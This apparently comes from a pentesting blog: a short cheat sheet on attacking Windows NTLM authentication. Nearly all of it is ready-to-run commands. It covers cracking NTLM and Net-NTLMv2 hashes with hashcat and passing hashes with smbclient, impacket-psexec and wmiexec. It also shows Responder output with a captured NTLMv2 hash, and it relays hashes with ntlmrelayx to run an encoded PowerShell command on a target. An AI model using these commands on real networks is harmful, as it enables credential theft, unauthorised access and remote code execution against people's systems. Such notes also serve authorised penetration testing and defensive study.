NTLM and Net-NTLMv2
NTLM
NTLM hashes are typically retrieved after compromising a Windows host, eleveting to System, and using a tool such as mimikats to dump the SAM file.
hashcat -m 1000 myhackingblog.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --forceIf the hash can't be cracked it can still be passed.
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b [email protected]
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b [email protected]NTLMv2
Net-NTLMv2 hashes are typically retrieved via Respodner.
kali@kali:~$ sudo responder -I eth0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
...
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:192.168.13.37
[SMB] NTLMv2-SSP Username : ADMIN01\james
[SMB] NTLMv2-SSP Hash : james::ADMIN01:1f9d4c51f6e74653:795F138EC69C274D0FD53BB32908A72B:010100000000000000B050CD1777D801B7585DF5719ACFBA0000000002000800360057004D00520001001E00570049004E002D00340044004E004800550058004300340054004900430004003400570049004E002D00340044004E0048005500580043003400540049004300hashcat -m 5600 james.hash /usr/share/wordlists/rockyou.txt --forceNot all hashes can be cracked luckily it's still possible to relay them. If you don't have a specific target in mind provide a list of hosts. ntlmrelayx will set up an SMB server it does not need to be run in conjuncture with responder.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.13.38 -c "powershell -enc JABjAGwAa..."Last updated
Was this helpful?